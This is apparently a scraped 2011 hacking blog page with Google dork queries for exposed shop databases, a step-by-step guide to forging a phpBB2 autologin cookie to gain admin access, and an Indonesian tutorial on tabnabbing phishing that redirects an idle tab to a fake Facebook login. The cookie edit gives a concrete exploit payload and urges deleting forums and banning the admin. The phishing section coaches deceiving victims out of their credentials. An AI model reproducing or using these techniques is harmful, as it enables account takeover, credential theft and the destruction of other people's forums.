inurl:midicart.mdb

inurl:shopdbtest.asp

POWERED BY SCHIZO!

site:ups.com intitle:”Ups Package tracking” intext:”1Z ### ### ## #### ### #”

  • Facebook
  • Google
  • StumbleUpon
  • TwitThis

How to: Hack A phpBB Forum

Filed Under (Easy Hacking) by Aidil Akbar on 27-10-2011

1315208246_phpbb-logo

Just visit the forums in Mozilla FireFox.2. Close the browser.

3. Open cookies.txt (located at C:\Documents and
Settings\username\Application\
Data\MozillaFirefox\Profiles\blah.default). You have to view hidden
files and folders to see Application Data.

4. Look for something like this:

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
//
127.0.0.1 is the domain for the forum. a%3A0%3A%7B%7D is the cookie
data. It says you are a visitor.

5. Open cookies.txt with your text editor, I used WordPad, and replace

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
//
with

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
//
save cookies.txt.

6. Open your browser again and go directly to the forums. You should
now be logged in as an admin! This doesnt always work though, as some
forums have security patches installed.
Destroy everything by going to the admin control panel and delete
every forum. Then do an IP ban on the admin..
Just kiddin, Do whatever U like ..
~By AP3X Pr3D4t0r

  • Facebook
  • Google
  • StumbleUpon
  • TwitThis

Tehnik Phising Facebook (Tabnabbing Tutorial By Bluff Master Hacker)

Filed Under (Easy Hacking, Facebook Trick/Hacking) by Aidil Akbar on 18-10-2011

296847_214402948618532_173399162718911_567592_5974155_n2-150x1501114

Tabnabbing berfungsi untuk mempermanis phisingan anda, bekerja untuk lingkungan multitab browser (ex: mozilla, google chrome, dll)

Jika anda pernah memakai atau menggunakan phising untuk mengelabui korban-korban anda, maka thread ini sebagai pemanis dari phisingan anda.

Ide ini berawal dari pemikiran yang sederhana menggunakan multi tab untuk mengecoh korban anda dan dilakukan oleh javascript. Tabnabbing ini sebenernnya ialah penghubung dari 2 halaman.

Anggaplah Ada dua halam halaman A dan Halaman B. Kita memberikan halaman A ke pada Korban, lalu korban melihat halaman A dalam tab browser dan kemudian saat ia lengah (tak sadar), korban meninggalkan tab halaman A tersebut untuk melihat tab - tab yang lain (beberapa website lain) di browser.

Apabila si korban tidak akan kembali ke halaman A untuk beberapa waktu yang di tentukan, maka otomatis halaman A akan ter-redirect ke halaman B dan Halaman B ini ialah phishingan Anda. redirect ini akan dirubah otomatis oleh sebuah Javascript.

Anda dapat men-download alat yang dibutuhkan.

file:

- php/html palsu ==> ini adalah halaman A (ex: situs-situs deface atau situs yg sengaja anda buat untuk jebakan) dalam hal ini saya mendemokan menggunakan fake google

- php/html phisingan anda ==> ini adalah halaman B (ex: http://hostingan-anda.com/fakebook.php )

- filejavascript.js ==> fungsi meredirect dari halaman A ke halaman B (ada didalam file download yg akan di beri)

- injectingc0de.txt => fungsi untuk memanggil filejavascript.js [color=red](ada didalam file download yg akan di beri)

DOWNLOAD : here

MIRROR : http://v5.indowebster.com//tabnabing_by_…
By z3r0k1d

  • Facebook
  • Google
  • StumbleUpon
  • TwitThis